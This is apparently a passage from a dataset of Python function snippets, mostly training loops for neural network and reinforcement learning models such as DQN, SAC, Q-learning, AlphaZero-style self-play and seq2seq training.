self.step_increment) * (1 - dones)\n )", "def train(self, epoches, batch_size):\n def _padding_batch(x_inputs, y_inputs):\n # x_inputs is 2-d array\n max_length = max([len(x) for x in x_inputs])\n real_length = [len(x) for x in x_inputs]\n\n x_outputs = []\n for x in x_inputs:\n padding_size = max_length - len(x)\n x_outputs.append(\n np.concatenate([np.array(x), np.zeros(padding_size,\n dtype=\"int32\")]))\n return np.array(x_outputs), np.array(y_inputs), real_length\n\n\n x_inputs, y_inputs = self.convert_data_to_model_input(self.train_data)\n test_x_inputs, test_y_inputs = self.convert_data_to_model_input(self.test_data, add_unknow_words=False)\n test_x_inputs, test_y_inputs, test_real_length = _padding_batch(test_x_inputs,\n test_y_inputs)\n\n self.save_lexicon(\"log/lexicon\")\n\n train_x_inputs = x_inputs[0:11000]\n train_y_inputs = y_inputs[0:11000]\n\n validate_x_inputs = x_inputs[11000:]\n validate_y_inputs = y_inputs[11000:]\n validate_x_inputs, validate_y_inputs, validate_real_length = _padding_batch(\n validate_x_inputs, validate_y_inputs)\n\n assert len(train_y_inputs) == len(train_x_inputs)\n assert len(validate_y_inputs) == len(validate_x_inputs)\n print(\"train {} validate {} test {}\".format(len(train_y_inputs),\n len(validate_y_inputs), len(test_y_inputs)))\n assert len(self.vocab) == len(self.embeddings)\n\n # do training\n batches 
= len(train_y_inputs) // batch_size\n\n rnn_model = RnnTextClassifyModel(\n class_number=len(self.labels), learning_rate=0.01,\n gradients_norm=5, keep_rate=0.5, vocab_size=len(self.vocab),\n embedding_size=self.embedding_size, hidden_units_size=128)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # must assigned\n embedding_input = tf.constant(np.array(self.embeddings), dtype=tf.float32)\n assign_embedding_op = tf.assign(rnn_model.embeddings, embedding_input)\n embedding_in_graph = sess.run(assign_embedding_op);\n\n global_step = 0\n for epoch in range(epoches):\n print(\"training @ epoch \", epoch)\n for i in range(batches):\n\n x_inputs_batch = train_x_inputs[i * batch_size:(i+1) *\n batch_size]\n y_inputs_batch = train_y_inputs[i * batch_size:(i+1) *\n batch_size]\n x_inputs_batch, y_inputs_batch, real_length = _padding_batch(\n x_inputs_batch, y_inputs_batch)\n\n loss_val, _ = sess.run(\n [rnn_model.loss, rnn_model.train_op],\n {rnn_model.x_holder:x_inputs_batch,\n rnn_model.y_holder:y_inputs_batch,\n rnn_model.sequence_length: real_length})\n\n print(\"loss {} @ step {}\".format(loss_val, global_step))\n\n #saver.save(sess, \"log/cnn_model\", global_step=global_step)\n global_step += 1\n\n if global_step % 100 == 0:\n print(\"______validating\")\n accuracy_val = sess.run(rnn_model.accuracy,\n {rnn_model.x_holder: validate_x_inputs,\n rnn_model.y_holder: validate_y_inputs,\n rnn_model.sequence_length: validate_real_length,\n rnn_model.keep_rate : 1.0})\n print(\"______valiation_accuracy {} at step {}\".format(accuracy_val,\n global_step))\n\n accuracy_val = sess.run(rnn_model.accuracy,\n {rnn_model.x_holder: x_inputs_batch,\n rnn_model.y_holder: y_inputs_batch,\n rnn_model.sequence_length: real_length,\n rnn_model.keep_rate : 1.0})\n print(\"______train_accuracy {} at step {}\".format(accuracy_val,\n global_step))\n\n\n if batches * batch_size < len(train_y_inputs):\n x_inputs_batch = train_x_inputs[batches * batch_size:]\n y_inputs_batch = train_y_inputs[batches * batch_size:]\n x_inputs_batch, y_inputs_batch, real_length = _padding_batch(\n x_inputs_batch, y_inputs_batch)\n\n loss_val, _ = sess.run(\n [rnn_model.loss, rnn_model.train_op],\n {rnn_model.x_holder:x_inputs_batch,\n rnn_model.y_holder:y_inputs_batch,\n rnn_model.sequence_length: real_length})\n\n print(\"loss {} @ step {}\".format(loss_val, global_step))\n global_step += 1\n\n # do evaluate on test data\n print(\"______test accuracy on epoch \", epoch)\n accuracy_val = sess.run(rnn_model.accuracy,\n {rnn_model.x_holder: test_x_inputs,\n rnn_model.y_holder: test_y_inputs,\n rnn_model.sequence_length: test_real_length,\n rnn_model.keep_rate : 1.0})\n\n print(\"______test_accuracy {} at epoch {}\".format(accuracy_val,\n epoch))", "def train_workers(self):\n args = dict(actor=self.actor,\n critic=self.critic,\n gamma=self.gamma,\n lamda=self.lamda or self.gamma / 1.005,\n device=self.device,\n optimizers=[self.actor_optimizer, self.critic_optimizer])\n workers = [Worker(i, self.action_size, self.state_size, **args)\n for i in range(self.n_workers)\n ]\n\n print(f'Worker count: {len(workers)}')\n\n for worker in workers:\n worker.start()\n\n while len(constants.scores) < self.n_steps:\n time.sleep(400) # save checkpoint every 400 ms\n\n print(f'\\nCurrent scores: {constants.scores}')\n\n self.save(constants.episode)\n print(f'\\nCheckpoint saved at episode: {constants.episode}\\n')", "def train_fru(model, epochs=EPOCHS):\n train(model, epochs=epochs, dataset=FRUDataset)", "def 
train_multiple_eps_dynamic(self, env, no_episodes=200, ng_int=50, horizon=1000, lr=0.1):\n\n\t\tr_vec = []\n\t\tep_len_vec = []\n\t\ttasks = 0\n\t\tfor i in range(no_episodes):\n\t\t\tif(i % ng_int == 0):\n\t\t\t\tgoal_index = [0, 12, 156, 168]\n\t\t\t\tnew_goal = [goal_index[tasks]]\n\t\t\t\ttasks += 1\n\t\t\t\tenv.reset(loc_r=new_goal, loc_t=new_goal)\n\t\t\t\t# new_goal = sample(env.listGoalStates(), 1)\n\t\t\t\t# env.reset(loc_r=new_goal, loc_t=new_goal)\n\n\t\t\t# Run the agent for one episode and get a vector of rewards and a scalar for episode length\n\t\t\tr_ep, ep_len = self.train_one_eps(env, horizon=horizon, lr=lr)\n\n\t\t\t# Storing the information\n\t\t\tr_vec.append(r_ep)\n\t\t\tep_len_vec.append(ep_len)\n\n\t\treturn r_vec, ep_len_vec", "def train(self, environment, seed=0):\n # set the seeds\n np.random.seed(seed)\n environment.seed(seed)\n # prepare the file for the results\n save_results = SaveResults()\n save_results.set_seed(seed)\n\n # prepare to display the states\n if self.parameters[\"display_environment\"]:\n self.show_render = ShowRender()\n\n for t in tqdm(range(1, self.parameters[\"number_episodes\"] + 1)):\n self._train_simulate(environment, t)\n\n if not t % 200:\n save_results.write_message_in_a_file(\"score\", self.score)", "def fit(self, env, env_eval, num_iterations, max_episode_length=None):\n train_counter = 0;\n eval_res_hist = np.zeros((1,3));\n\n time_this, ob_this, is_terminal = env.reset()\n\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n\n setpoint_this = ob_this[6:8]\n \n this_ep_length = 0;\n flag_print_1 = True;\n flag_print_2 = True;\n action_counter = 0;\n \n for step in range(num_iterations):\n #Check which stage is the agent at. If at the collecting stage,\n #then the actions will be random action.\n if step <= self._num_burn_in:\n if flag_print_1:\n logging.info (\"Collecting samples to fill the replay memory...\");\n flag_print_1 = False;\n\n action_mem = self.select_action(None, stage = 'collecting');\n action = self._policy.process_action(setpoint_this, action_mem)\n\n else:\n if flag_print_2:\n logging.info (\"Start training process...\");\n flag_print_2 = False;\n\n obs_this_net = self._preprocessor.process_observation_for_network(\n ob_this, self._min_array, self._max_array)\n \n state_this_net = np.append(obs_this_net[0:13], obs_this_net[14:]).reshape(1,16)\n\n action_mem = self.select_action(state_this_net, stage = 'training')\n # covert command to setpoint action \n action = self._policy.process_action(setpoint_this, action_mem) \n\n action_counter = action_counter + 1 if action_counter < 4 else 1;\n\n time_next, ob_next, is_terminal = env.step(action)\n ob_next = self._preprocessor.process_observation(time_next, ob_next)\n \n setpoint_next = ob_next[6:8]\n \n #check if exceed the max_episode_length\n if max_episode_length != None and \\\n this_ep_length >= max_episode_length:\n is_terminal = True;\n\n #save sample into memory \n self._memory.append(Sample(ob_this, action_mem, ob_next\n , is_terminal))\n\n \n #Check which stage is the agent at. 
If at the training stage,\n #then do the training\n if step > self._num_burn_in:\n #Check the train frequency\n if action_counter % self._train_freq == 0 \\\n and action_counter > 0:\n action_counter = 0;\n #Eval the model\n if train_counter % self._eval_freq == 0:\n eval_res = self.evaluate(env_eval, self._eval_epi_num\n , show_detail = True);\n eval_res_hist = np.append(eval_res_hist\n , np.array([step\n , eval_res[0], eval_res[1]]).reshape(1, 3)\n , axis = 0);\n np.savetxt(self._log_dir + '/eval_res_hist.csv'\n , eval_res_hist, delimiter = ',');\n logging.info ('Global Step: %d, '%(step), 'evaluation average \\\n reward is %0.04f, average episode length is %d.'\\\n %eval_res);\n \n \n #Sample from the replay memory\n samples = self._preprocessor.process_batch(\n self._memory.sample(self._batch_size), \n self._min_array, self._max_array);\n #Construct target values, one for each of the sample \n #in the minibatch\n samples_x = None;\n targets = None;\n for sample in samples:\n sample_s = np.append(sample.obs[0:13], sample.obs[14:]).reshape(1,16)\n sample_s_nex = np.append(sample.obs_nex[0:13], \n sample.obs_nex[14:]).reshape(1,16)\n sample_r = self._preprocessor.process_reward(sample.obs_nex[12:15])\n\n target = self.calc_q_values(sample_s);\n a_max = self.select_action(sample_s_nex, stage = 'greedy');\n \n \n\n if sample.is_terminal:\n target[0, sample.a] = sample_r;\n else:\n target[0, sample.a] = (sample_r\n + self._gamma \n * self.calc_q_values_1(\n sample_s_nex)[0, a_max]);\n if targets is None:\n targets = target;\n else:\n targets = np.append(targets, target, axis = 0);\n if samples_x is None:\n samples_x = sample_s;\n else:\n samples_x = np.append(samples_x, sample_s, axis = 0);\n #Run the training\n \n \n feed_dict = {self._state_placeholder:samples_x\n ,self._q_placeholder:targets}\n sess_res = self._sess.run([self._train_op, self._loss]\n , feed_dict = feed_dict);\n \n #Update the target parameters\n if train_counter % self._target_update_freq == 0:\n self.update_policy();\n logging.info('Global Step %d: update target network.' 
\n %(step));\n #Save the parameters\n if train_counter % self._save_freq == 0 or step + 1 == num_iterations:\n checkpoint_file = os.path.join(self._log_dir\n , 'model_data/model.ckpt');\n self._saver.save(self._sess\n , checkpoint_file, global_step=step);\n \n if train_counter % 100 == 0:\n logging.info (\"Global Step %d: loss %0.04f\"%(step, sess_res[1]));\n # Update the events file.\n summary_str = self._sess.run(self._summary, feed_dict=feed_dict)\n self._summary_writer.add_summary(summary_str, train_counter);\n self._summary_writer.add_graph(self._sess.graph);\n self._summary_writer.flush()\n \n train_counter += 1;\n \n #check whether to start a new episode\n if is_terminal:\n time_this, ob_this, is_terminal = env.reset()\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n setpoint_this = ob_this[6:8]\n\n this_ep_length = 0;\n action_counter = 0;\n else:\n ob_this = ob_next\n setpoint_this = setpoint_next\n time_this = time_next\n this_ep_length += 1;", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def TrainOneStep(self):\n pass", "def run(num_epochs, encoded_dim):\n # for patient_ in get_patient_ids():\n for patient_ in ['16']:\n print(\"Starting on index: \" + str(patient_))\n training_ae(num_epochs, encoded_dim, patient_, True)\n print(\"Completed \" + str(patient_) + \" reconstruction and encoding, saved test data to assess performance\")", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def train_by_episode(self, last_value=0):\n # implements A2C training from the last state\n # to the first state\n # discount factor\n gamma = 0.95\n r = last_value\n # the memory is visited in reverse as shown\n # in Algorithm 10.5.1\n for item in self.memory[::-1]:\n [step, state, next_state, reward, done] = item\n # compute the return\n r = reward + gamma*r\n item = [step, state, next_state, r, done]\n # train per step\n # a2c reward has been discounted\n self.train(item)", "def train(env, agents, data_log, n_episodes=10000, n_steps=None, generate_val_data=False, record_env=None, trainer=None):\n # Setup logging and start code\n logger = logging.getLogger('root')\n step_tot = 0\n logger.info(env.observation_space[0].high)\n alphas = [agent.alpha for agent in trainer.agents]\n data_log.log_var(\"alphas\", alphas)\n\n ep_generator = range(n_episodes) if n_episodes else itertools.count()\n # Start training\n for i in ep_generator:\n # Do some logging\n logger.info(\"episode:\" + str(i))\n data_log.set_episode(i)\n\n # Periodically store networks\n if i % 250 == 0: #was 25\n store_networks(trainer, agents, data_log)\n\n # Run a single episode\n score, step, extra_data = run_episode(env, agents, render=False, store_data=True, trainer=trainer)\n\n # Do more logging\n logger.info(\"Score: \" + str(score))\n step_tot += step\n data_log.set_step(step_tot)\n data_log.log_var(\"score\", score)\n alphas = [agent.alpha for agent in trainer.agents]\n data_log.log_var(\"alphas\", alphas)\n\n # Break training loop\n if n_steps and step_tot > n_steps:\n break\n\n #Periodically save logs\n if i % 50 == 0: #was 5\n logger.info(\"Saving log...\")\n data_log.save()\n logger.info(\"Saved log\")\n\n # Save logs one last time\n logger.info(\"Saving log...\")\n data_log.save()\n logger.info(\"Saved log\")\n return", "def 
Q_learning_train(env,alpha,gamma,epsilon,episodes):\n %time\n # For plotting metrics\n all_epochs = []\n all_penalties = []\n rewards = []\n \n #Initialize Q table of 22500 x 8 size (22500 states and 8 actions) with all zeroes\n q_table = np.zeros([env.observation_space.n, env.action_space.n]) \n \n for i in range(1, episodes+1):\n state = env.reset()\n episode_rewards = []\n\n epochs, penalties, reward, = 0, 0, 0\n done = False\n\n while not done:\n if random.uniform(0, 1) < epsilon:\n action = env.action_space.sample() # Explore action space randomly\n else:\n action = np.argmax(q_table[state]) # Exploit learned values by choosing optimal values\n\n next_state, reward, done, info = env.step(action) \n\n old_value = q_table[state, action]\n next_max = np.max(q_table[next_state])\n\n new_value = (1 - alpha) * old_value + alpha * (reward + gamma * next_max)\n q_table[state, action] = new_value\n\n if reward == -10:\n penalties += 1\n \n\n state = next_state\n episode_rewards.append(reward)\n epochs += 1\n \n if done == True:\n break \n if epochs == 1000:\n break \n rewards.append(np.sum(episode_rewards))\n \n if i % 1000 == 0:\n clear_output(wait=True)\n print(f\"Episode: {i}\")\n \n \n print(\"Training finished.\\n\")\n \n plt.plot(savgol_filter(rewards, 1001, 3, mode = \"interp\"))\n plt.title(\"Smoothened training reward per episode\", pad = 30, size = BIGGER_SIZE)\n plt.legend()\n plt.xlabel('Episodes', labelpad = 20);\n plt.ylabel('Total Reward', labelpad = 20);\n plt.tick_params(axis='both', which='major');\n plt.tick_params(axis='both', which='minor');\n #plt.xlim(0, 60000);\n #plt.ylim(0,50)\n #plt.xticks(np.arange(0, episodes+1, 5000));\n #plt.yticks(np.arange(min(rewards), max(rewards)+1, 1000));", "def train(self):\n\t\tself.model.fit(self.training_data, self.training_labels)", "def learn(self):\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n log.info(f'Starting Iter #{i} ...')\n # examples of the iteration\n if not self.skipFirstSelfPlay or i > 1:\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n for _ in tqdm(range(self.args.numEps), desc=\"Self Play\"):\n self.mcts = MCTS(self.game, self.nnet, self.args) # reset search tree\n iterationTrainExamples += self.executeEpisode()\n\n # save the iteration examples to the history \n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n log.warning(\n f\"Removing the oldest entry in trainExamples. len(trainExamplesHistory) = {len(self.trainExamplesHistory)}\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! 
the examples were collected using the model from the previous iteration, so (i-1) \n self.saveTrainExamples(i - 1)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n log.info('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game)\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare)\n\n log.info('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) < self.args.updateThreshold:\n log.info('REJECTING NEW MODEL')\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n else:\n log.info('ACCEPTING NEW MODEL')\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='best.pth.tar')", "def train(nepochs, model): \n if model == 'cnn':\n return gennet.train_cnn(nepochs, 'Resnet50')\n elif model == 'logreg':\n return gennet.train_logreg('Resnet50')", "def train(self,\n num_episodes = 100,\n num_steps = 500000,\n max_steps_per_episode = 10000,\n target_interval = 10000,\n learning_interval = 4,\n frame_skip = 1,\n warmup_steps = None,\n pretrain_steps = None,\n output_freq = 50,\n save_freq = 5, \n store_memory = False):\n \n # prefill memory with random transitions if requested\n if warmup_steps is not None:\n self._random_warmup(warmup_steps)\n \n # pretrain the agent on its on own memory\n if pretrain_steps is not None:\n self._pretrain(pretrain_steps, target_interval)\n \n # logging initialization\n self._score, self._q_values, self._losses = 0., [], []\n raw_frames = np.zeros(shape = (max_steps_per_episode, *self.env._unprocessed_frame.shape), dtype = np.uint8)\n\n episode_idx = 0\n while episode_idx < num_episodes or self._step_counter < num_steps:\n # reset environment and get first state\n self._start_episode()\n \n for i in range(max_steps_per_episode):\n \n #-------------------------------------------------------------------------------#\n #####################\n # Interactive Phase #\n #####################\n \n # choose an action, observe reactions of the environment and\n # add this experience to the agent's memory \n if self._step_counter % frame_skip == 0: \n action = self._make_decision()\n new_frame, reward, done, _ = self.env.step(action)\n self.memory.add_experience(action, reward, new_frame, 1, done)\n \n # update current state\n self._current_state[0, :(self.num_stacked_frames-1)] = self._current_state[0, 1:]\n self._current_state[0, self.num_stacked_frames-1] = new_frame\n #-------------------------------------------------------------------------------#\n \n \n #-------------------------------------------------------------------------------#\n ##################\n # Learning Phase #\n ##################\n \n # perform a parameter update of the current policy model\n if self._step_counter % learning_interval == 0:\n self._batch_update()\n \n # update the target model\n if self._step_counter % target_interval == 0:\n 
self._update_target_model()\n #-------------------------------------------------------------------------------#\n \n # logging\n self._score += self.env._unprocessed_reward\n raw_frames[i] = self.env._unprocessed_frame\n \n \n self._step_counter += 1\n \n if self.env.was_real_done:\n self.logger.add_episode_logs(self._step_counter, self._score, self._q_values, self._losses, raw_frames[:i])\n self._score, self._q_values, self._losses = 0., [], []\n break\n \n if done:\n self.env.reset()\n \n \n if not self.env.was_real_done:\n self.memory.add_experience(action, reward, new_frame, 1, True)\n self.logger.add_episode_logs(self._step_counter, self._score, self._q_values, self._losses, raw_frames[:i])\n self._score, self._q_values, self._losses = 0., [], []\n \n if episode_idx%(num_episodes/output_freq)==0:\n validation_score, validation_frames = self.test(record = True, max_steps_per_episode = max_steps_per_episode)\n #validation_score, validation_frames = 0, []\n lower_idx = int(clip(episode_idx-(num_episodes/output_freq)+1, 0, num_episodes-1))\n self.logger.show_progress(lower_idx, episode_idx, validation_score, validation_frames, self.policy_network.model)\n \n if episode_idx%(num_episodes/save_freq)==0:\n self.logger.make_plots()\n self.logger.save_all(self.policy_network.model, self.memory, store_memory)\n \n \n\n episode_idx += 1 \n print('==========================\\ntraining session completed\\n==========================\\n\\n\\n=======\\nSummary\\n======='\n )\n self.logger.show_progress(0, num_episodes, summary = True)\n self.logger.make_plots()\n self.logger.save_all(self.policy_network.model, self.memory, store_memory)", "def _Train(self, limit):\n if len(self.Memory)>BATCH_SIZE: \n # Limit of Agents to Train\n for i in range(limit): \n # 'n' number of rounds to train \n for _ in range(50):\n # Get Batch Data\n experiances = self.Memory.sample()\n # Train Models\n self._Learn(self.Actor[i], self.ActorTarget, self.actorOpt[i], experiances)", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a 
procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def train_episode(self, max_episode_length):\n\n # Populate the buffer\n self.populate_buffer(max_episode_length)\n\n # weight updates\n replay_samples = self.replay_buffer.sample(self.buffer_sample_size)\n state_batch = torch.from_numpy(replay_samples[0]).to(DEVICE)\n action_batch = torch.from_numpy(replay_samples[1]).to(DEVICE)\n reward_batch = (\n torch.from_numpy(replay_samples[2]).to(DEVICE).unsqueeze(1)\n )\n next_state_batch = torch.from_numpy(replay_samples[3]).to(DEVICE)\n dones = (\n torch.from_numpy(replay_samples[4])\n .type(torch.long)\n .to(DEVICE)\n .unsqueeze(1)\n )\n\n # alpha must be clamped with a minumum of zero, so use exponential.\n alpha = self.log_alpha.exp().detach()\n\n with torch.no_grad():\n # Figure out value function\n next_actions, log_next_actions, _ = self.policy.sample(\n next_state_batch\n )\n target_q1, target_q2 = self.avg_q_net(\n next_state_batch, next_actions\n )\n target_q = torch.min(target_q1, target_q2)\n next_state_values = target_q - alpha * log_next_actions\n\n # Calculate Q network target\n done_floats = dones.type(torch.float)\n q_target = reward_batch.clone()\n q_target += self.gamma * done_floats * next_state_values\n\n # Q net outputs values for all actions, so we index specific actions\n q1, q2 = self.q_net(state_batch, action_batch)\n q1_loss = F.mse_loss(q1, q_target)\n q2_loss = F.mse_loss(q2, q_target)\n\n # policy loss\n actions_pi, log_probs_pi, action_dist = self.policy.sample(state_batch)\n q1_pi, q2_pi = self.q_net(state_batch, actions_pi)\n q_pi = torch.min(q1_pi, q2_pi)\n policy_loss = ((alpha * log_probs_pi) - q_pi).mean()\n\n # update parameters\n self.q_optim.zero_grad()\n q1_loss.backward()\n self.q_optim.step()\n\n self.q_optim.zero_grad()\n q2_loss.backward()\n self.q_optim.step()\n\n self.policy_optim.zero_grad()\n policy_loss.backward()\n self.policy_optim.step()\n\n # automatic entropy tuning\n alpha_loss = (\n self.log_alpha * (log_probs_pi + self.entropy_target).detach()\n )\n alpha_loss = -alpha_loss.mean()\n\n if self.entropy_tuning:\n self.alpha_optim.zero_grad()\n alpha_loss.backward()\n self.alpha_optim.step()\n\n # Step average Q net\n move_average(self.q_net, self.avg_q_net, self.tau)\n\n # logging\n self.tbx_logger(\n {\n \"loss/q1 loss\": q1_loss.item(),\n \"loss/q2 loss\": q2_loss.item(),\n \"loss/pi loss\": policy_loss.item(),\n \"loss/alpha loss\": alpha_loss.item(),\n \"Q/avg_q_target\": q_target.mean().item(),\n \"Q/avg_q1\": q1.mean().item(),\n \"Q/avg_q2\": q2.mean().item(),\n 
\"Q/avg_reward\": reward_batch.mean().item(),\n \"Q/avg_V\": next_state_values.mean().item(),\n \"H/alpha\": alpha.item(),\n \"H/pi_entropy\": action_dist.entropy().mean(),\n \"H/pi_log_pi\": log_probs_pi.mean(),\n },\n self.training_i,\n )\n\n self.training_i += 1\n self.checkpointer.increment_counter()", "def TrainEpoch(ss):\n ss.StopNow = False\n curEpc = ss.TrainEnv.Epoch.Cur\n while True:\n ss.TrainTrial()\n if ss.StopNow or ss.TrainEnv.Epoch.Cur != curEpc:\n break\n ss.Stopped()", "def enjoy_model(env, obs_placeholder, epsilon_placeholder, stochastic_placeholder,\n output_actions, sess, num_episodes=1):\n for _ in range(num_episodes):\n obs, done = env.reset(), False\n episode_rew = 0\n while not done:\n env.render()\n time.sleep(0.02)\n feed_dict = {obs_placeholder: np.array(obs).reshape((1,) + obs.shape),\n epsilon_placeholder: 0.0,\n stochastic_placeholder: False}\n action = sess.run(output_actions, feed_dict)[0]\n obs, rew, done, _ = env.step(action)\n episode_rew += rew\n print(\"Episode rew\", episode_rew)\n time.sleep(1)", "def _train_epochs(self, data, model, n_epochs, start_epoch, start_step, dev_data, teacher_forcing_ratio, early_stopping_patience):\n print_loss_total = 0 # Reset every print_every\n epoch_loss_total = 0 # Reset every epoch\n\n device = None if torch.cuda.is_available() else -1\n batch_iterator = torchtext.data.BucketIterator(data, batch_size=self.batch_size, repeat=False,\n sort_key=lambda x: len(x.src),\n shuffle=True, device=device, sort=False, sort_within_batch=True)\n\n steps_per_epoch = len(batch_iterator)\n total_steps = steps_per_epoch * n_epochs\n\n step = start_step\n step_elapsed = 0\n previous_dev_loss = 10e6\n dev_loss_increased_epochs = 0\n for epoch in range(start_epoch, n_epochs + 1):\n self.logger.info(\"Epoch: %d, Step: %d\" % (epoch, step))\n\n batch_generator = batch_iterator.__iter__()\n # consuming seen batches from previous training\n for _ in range((epoch - 1) * steps_per_epoch, step):\n next(batch_generator)\n\n model.train(True)\n for batch in batch_generator:\n step += 1\n step_elapsed += 1\n\n input_variables, input_lengths = getattr(batch, UTTERANCE_FIELD_NAME)\n target_variables = getattr(batch, RESPONSE_FIELD_NAME)\n emotion_variables = getattr(batch, EMOTION_FIELD_NAME)\n\n loss = self.train_batch(input_variables, input_lengths.tolist(), target_variables, emotion_variables,\n model, teacher_forcing_ratio)\n\n # Record average loss\n print_loss_total += loss\n epoch_loss_total += loss\n\n if step % self.print_every == 0 and step_elapsed > self.print_every:\n print_loss_avg = print_loss_total / self.print_every\n print_loss_total = 0\n log_msg = 'Progress: %.2f%%, Train %s: %.4f' % (\n step / total_steps * 100,\n self.loss.name,\n print_loss_avg)\n self.logger.info(log_msg)\n beam_search = EmotionSeq2seq(model.encoder, EmotionTopKDecoder(model.decoder, 20))\n predictor = Predictor(beam_search, data.vocabulary, data.emotion_vocabulary)\n seq = \"how are you\".split()\n self.logger.info(\"Happy: \" + \" \".join(predictor.predict(seq, 'happiness')))\n self.logger.info(\"Angry: \" + \" \".join(predictor.predict(seq, 'anger')))\n\n # Checkpoint\n if step % self.checkpoint_every == 0 or step == total_steps:\n Checkpoint(model=model,\n optimizer=self.optimizer,\n epoch=epoch, step=step).save(self.expt_dir)\n\n if step_elapsed == 0:\n continue\n\n epoch_loss_avg = epoch_loss_total / min(steps_per_epoch, step - start_step)\n epoch_loss_total = 0\n log_msg = \"Finished epoch %d: Train %s: %.4f\" % (epoch, self.loss.name, epoch_loss_avg)\n 
if dev_data is not None:\n dev_loss, accuracy = self.evaluator.evaluate(model, dev_data)\n self.optimizer.update(dev_loss)\n log_msg += \", Dev %s: %.4f, Accuracy: %.4f\" % (self.loss.name, dev_loss, accuracy)\n model.train(mode=True)\n if dev_loss > previous_dev_loss:\n dev_loss_increased_epochs += 1\n if dev_loss_increased_epochs == early_stopping_patience:\n self.logger.info(\"EARLY STOPPING\")\n break\n else:\n dev_loss_increased_epochs = 0\n previous_dev_loss = dev_loss\n Checkpoint(model=model,\n optimizer=self.optimizer,\n epoch=epoch, step=step).save(self.expt_dir)\n else:\n self.optimizer.update(epoch_loss_avg)\n\n self.logger.info(log_msg)", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n player = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, player)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, player, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, player = self.game.getNextState(board, player, action)\n\n r = self.game.getGameEnded(board, player)\n\n if r != 0:\n ex = [(x[0], x[2], r * ((-1) ** (x[1] != player))) for x in trainExamples]\n return ex", "def train(self):\n self.emission_model(self.train_data)\n self.transition_model(self.train_data)", "def training(self, dataset, repeat=1, gamma=1.0, learning_rate=0.1, model='3yo'):\n for _ in range(repeat):\n for episode in dataset:\n # 1- Get the data stored inside the dataset\n image_index = episode[0] # image of the object\n label_index = episode[1] # label given by the informant\n informant_index = episode[2] # a integer representing the informant\n informant_action = episode[3] # 0=reject, 